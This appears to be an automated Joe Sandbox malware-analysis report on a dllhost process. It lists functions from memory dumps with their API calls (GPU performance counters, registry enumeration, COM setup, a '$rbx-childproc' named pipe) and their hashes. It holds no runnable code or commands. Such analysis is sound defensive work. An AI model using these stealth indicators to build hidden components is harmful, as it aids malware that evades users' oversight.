Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 87f68ddd6d39bac4dcc660ee8d04ff5fe8dd1530001522c57dc9458773e7517d
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 6E518B31785644D1FA1EDB56A840BEB2290AB4DFB8F584729AF3B673E0EF38D445C640

Function 000001C0401F33A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001C0401F33FD
GetProcessHeap.KERNEL32 ref: 000001C0401F3412
HeapAlloc.KERNEL32 ref: 000001C0401F3420
PdhGetCounterInfoW.PDH ref: 000001C0401F3436
StrCmpW.SHLWAPI ref: 000001C0401F344B

Part of subcall function 000001C0401F3950: StrCmpNW.SHLWAPI ref: 000001C0401F3972
Part of subcall function 000001C0401F3950: StrStrW.SHLWAPI ref: 000001C0401F3990
Part of subcall function 000001C0401F3950: StrToIntW.SHLWAPI ref: 000001C0401F39B7

GetProcessHeap.KERNEL32 ref: 000001C0401F3488
HeapFree.KERNEL32 ref: 000001C0401F3496

Strings

\GPU Engine(*)\Running Time, xrefs: 000001C0401F3444

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: b99e6cab7b002ebe7b10ba186ef879e74ec6286c40f8cb6b41cb8a605bab9315
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 3531AE32A40B52D6F72ADF12A904B9BB3A0F78CFD9F4405259F4A63A64DF38C4568740

Function 000001C0401C33A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001C0401C33FD
GetProcessHeap.KERNEL32 ref: 000001C0401C3412
HeapAlloc.KERNEL32 ref: 000001C0401C3420
PdhGetCounterInfoW.PDH ref: 000001C0401C3436
StrCmpW.SHLWAPI ref: 000001C0401C344B

Part of subcall function 000001C0401C3950: StrCmpNW.SHLWAPI ref: 000001C0401C3972
Part of subcall function 000001C0401C3950: StrStrW.SHLWAPI ref: 000001C0401C3990
Part of subcall function 000001C0401C3950: StrToIntW.SHLWAPI ref: 000001C0401C39B7

GetProcessHeap.KERNEL32 ref: 000001C0401C3488
HeapFree.KERNEL32 ref: 000001C0401C3496

Strings

\GPU Engine(*)\Running Time, xrefs: 000001C0401C3444

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 48f9a02a17a62890ebc0e7af7c22a680ce2622a398f7dc82b4e04793de15a47a
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 4B317F32684A41E6F72AEF12A844B9AA3A0BB8CFD9F4445259F4B63634DF38D4568740

Function 000001C0401F34B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001C0401F3516
GetProcessHeap.KERNEL32 ref: 000001C0401F3527
HeapAlloc.KERNEL32 ref: 000001C0401F3535
PdhGetCounterInfoW.PDH ref: 000001C0401F354B
StrCmpW.SHLWAPI ref: 000001C0401F3560

Part of subcall function 000001C0401F3950: StrCmpNW.SHLWAPI ref: 000001C0401F3972
Part of subcall function 000001C0401F3950: StrStrW.SHLWAPI ref: 000001C0401F3990
Part of subcall function 000001C0401F3950: StrToIntW.SHLWAPI ref: 000001C0401F39B7

GetProcessHeap.KERNEL32 ref: 000001C0401F358D
HeapFree.KERNEL32 ref: 000001C0401F359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 000001C0401F3559

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: d919958bcd1b899ac55d4ff44e3e4b250feed147d51527985fd43890fa905512
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 1D316F31650B52CAFB5ADF22A944B9BA3A0B78DF98F4441259F4A63774DF38C446C600

Function 000001C0401C34B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001C0401C3516
GetProcessHeap.KERNEL32 ref: 000001C0401C3527
HeapAlloc.KERNEL32 ref: 000001C0401C3535
PdhGetCounterInfoW.PDH ref: 000001C0401C354B
StrCmpW.SHLWAPI ref: 000001C0401C3560

Part of subcall function 000001C0401C3950: StrCmpNW.SHLWAPI ref: 000001C0401C3972
Part of subcall function 000001C0401C3950: StrStrW.SHLWAPI ref: 000001C0401C3990
Part of subcall function 000001C0401C3950: StrToIntW.SHLWAPI ref: 000001C0401C39B7

GetProcessHeap.KERNEL32 ref: 000001C0401C358D
HeapFree.KERNEL32 ref: 000001C0401C359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 000001C0401C3559

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: e9454ae95fe4cc8feb11f1109876b64282de2ce6c286c512f1d48cb157c6b11d
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: F6316F31694B41DAF72ADF22A884B9B67A1BB8CF98F4441259F4B63734DF38D446C600

Function 000000014000217C Relevance: 13.6, APIs: 9, Instructions: 100memorycomCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0000000140002192
SysAllocString.OLEAUT32 ref: 00000001400021A2
CoInitializeEx.OLE32 ref: 00000001400021AF
CoInitializeSecurity.OLE32 ref: 00000001400021E6
CoCreateInstance.OLE32 ref: 0000000140002226
VariantInit.OLEAUT32 ref: 0000000140002238
CoUninitialize.OLE32 ref: 00000001400022D2
SysFreeString.OLEAUT32 ref: 00000001400022DB
SysFreeString.OLEAUT32 ref: 00000001400022E4

Memory Dump Source

Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd

Similarity

API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
String ID:
API String ID: 4184240511-0
Opcode ID: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
Instruction ID: e7c2dfd052af18fd3abcefe0f72c8446b9113f84b0d7c840ae7e34f71e75c1d0
Opcode Fuzzy Hash: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
Instruction Fuzzy Hash: FF4146B2704A859AE711CF6AF8443DD63B1FB89B99F445225BF0A43A69DF38C159C304

Function 000001C0401FA22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001C0401FA289

Part of subcall function 000001C0401FB144: __GetUnwindTryBlock.LIBCMT ref: 000001C0401FB187
Part of subcall function 000001C0401FB144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001C0401FB1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001C0401FA361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001C0401FA5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001C0401FA6BC

Strings

csm, xrefs: 000001C0401FA30A
csm, xrefs: 000001C0401FA2A3
csm, xrefs: 000001C0401FA384

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 48305f803f293ddec5f3931c42f65467c20365504f080a3b6a3f53de56a74bfe
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: A4D19DB2644781CAFB2ADB659440BDE37A4F749B9CF540106EF8A67BA6CB3CD481C700

Function 000001C03F6E962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001C03F6E9689

Part of subcall function 000001C03F6EA544: __GetUnwindTryBlock.LIBCMT ref: 000001C03F6EA587
Part of subcall function 000001C03F6EA544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001C03F6EA5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001C03F6E9761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001C03F6E99AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001C03F6E9ABC

Strings

csm, xrefs: 000001C03F6E970A
csm, xrefs: 000001C03F6E9784
csm, xrefs: 000001C03F6E96A3

Memory Dump Source

Source File: 00000028.00000003.2319649635.000001C03F6E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C03F6E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_3_1c03f6e0000_dllhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: af99934c436129ad321223bb4b68badd926e3b9bc2a2d268deffcc7e90b81214
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: 67D18B3B740780CAFB629F659680BED37A8FB69788F142149EEC957B96DB34C090C740

Function 000001C0401CA22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001C0401CA289

Part of subcall function 000001C0401CB144: __GetUnwindTryBlock.LIBCMT ref: 000001C0401CB187
Part of subcall function 000001C0401CB144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001C0401CB1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001C0401CA361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001C0401CA5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001C0401CA6BC

Strings

csm, xrefs: 000001C0401CA30A
csm, xrefs: 000001C0401CA384
csm, xrefs: 000001C0401CA2A3

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 9f2edcd22ff339fac1a10f4690f925bbb237d1bd662c2ff94e72297a1ec1730c
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 32D18072588B80CAFB2ADF6594447DE77A0F749B8CF545116EF8A67BA6CB38C481C700

Function 000000014000104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000001400010B1
RegEnumValueW.ADVAPI32 ref: 0000000140001117
GetProcessHeap.KERNEL32 ref: 000000014000115A
HeapAlloc.KERNEL32 ref: 0000000140001168
GetProcessHeap.KERNEL32 ref: 0000000140001185
HeapFree.KERNEL32 ref: 0000000140001193

Strings

d, xrefs: 00000001400010D6

Memory Dump Source

Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
Instruction ID: 03f89dd543fa71545bde49b2618b44e89e47b203f0d8546e2499baea92addc30
Opcode Fuzzy Hash: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
Instruction Fuzzy Hash: D1412AB2614B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40

Function 000001C0401F104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001C0401F10B1
RegEnumValueW.ADVAPI32 ref: 000001C0401F1117
GetProcessHeap.KERNEL32 ref: 000001C0401F115A
HeapAlloc.KERNEL32 ref: 000001C0401F1168
GetProcessHeap.KERNEL32 ref: 000001C0401F1185
HeapFree.KERNEL32 ref: 000001C0401F1193

Strings

d, xrefs: 000001C0401F10D6

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: d4cccac9f6330354f92cc7da93b19dc376f574822e866ed48f0c969f215c0817
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 07416C33254B85DAE765CF21E444B9FB7A1F389B98F448129DB8A17B58DF38C489CB40

Function 000001C0401C104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001C0401C10B1
RegEnumValueW.ADVAPI32 ref: 000001C0401C1117
GetProcessHeap.KERNEL32 ref: 000001C0401C115A
HeapAlloc.KERNEL32 ref: 000001C0401C1168
GetProcessHeap.KERNEL32 ref: 000001C0401C1185
HeapFree.KERNEL32 ref: 000001C0401C1193

Strings

d, xrefs: 000001C0401C10D6

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 27601eb524535a590ab7eb207c022eed9c5aec9d4536a118c02c05f4ac25c46f
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: BB415B32294B80DAF765CF21E444B9A77A1F389F98F448129DB8A17A68DF3CD485CB40

Function 000001C0401F2518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001C0401F252D
GetCurrentProcessId.KERNEL32 ref: 000001C0401F2537
CreateFileW.KERNEL32 ref: 000001C0401F2568
WriteFile.KERNEL32 ref: 000001C0401F2590
ReadFile.KERNEL32 ref: 000001C0401F25AF
CloseHandle.KERNEL32 ref: 000001C0401F25B8

Strings

\\.\pipe\$rbx-childproc, xrefs: 000001C0401F2549

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 2122d8477102575d73a4408c706c79ebf633f9545410ca1f2f096999fb48314e
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: A3115632658B51C2F715DB21F558B9B6761F38DB98F940211EB9A12AE8CF3CC148CB40

Function 000001C0401C2518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001C0401C252D
GetCurrentProcessId.KERNEL32 ref: 000001C0401C2537
CreateFileW.KERNEL32 ref: 000001C0401C2568
WriteFile.KERNEL32 ref: 000001C0401C2590
ReadFile.KERNEL32 ref: 000001C0401C25AF
CloseHandle.KERNEL32 ref: 000001C0401C25B8

Strings

\\.\pipe\$rbx-childproc, xrefs: 000001C0401C2549

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: c74fd2aceb61391fd1b517086b69a2ca0f30a4aec48b2079e62a1e4f492812bd
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 69112632658A40C2F715DB21F418B9B6760FB89B99F944215EB9A12AA8CF3CC148CB40

Function 000001C0401F7C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001C0401F7C78
__scrt_acquire_startup_lock.LIBCMT ref: 000001C0401F7CCA
_RTC_Initialize.LIBCMT ref: 000001C0401F7CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001C0401F7D1E
__scrt_release_startup_lock.LIBCMT ref: 000001C0401F7D49

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 6fcf7b432d52beef736993e902e9e4e3d878406fe98565b06715c11e3e38dcf3
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 8381AF70784243CAFA5FEB659441FEB6291AB8EF8CF544115AB0A773F6DB38C8428300

Function 000001C03F6E7050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001C03F6E7078
__scrt_acquire_startup_lock.LIBCMT ref: 000001C03F6E70CA
_RTC_Initialize.LIBCMT ref: 000001C03F6E70F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001C03F6E711E
__scrt_release_startup_lock.LIBCMT ref: 000001C03F6E7149

Memory Dump Source

Source File: 00000028.00000003.2319649635.000001C03F6E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C03F6E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_3_1c03f6e0000_dllhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: da9a399ad666ffbd2fedfc340733b3d021ae22e6e339704dadd05f13fd0bf4ef
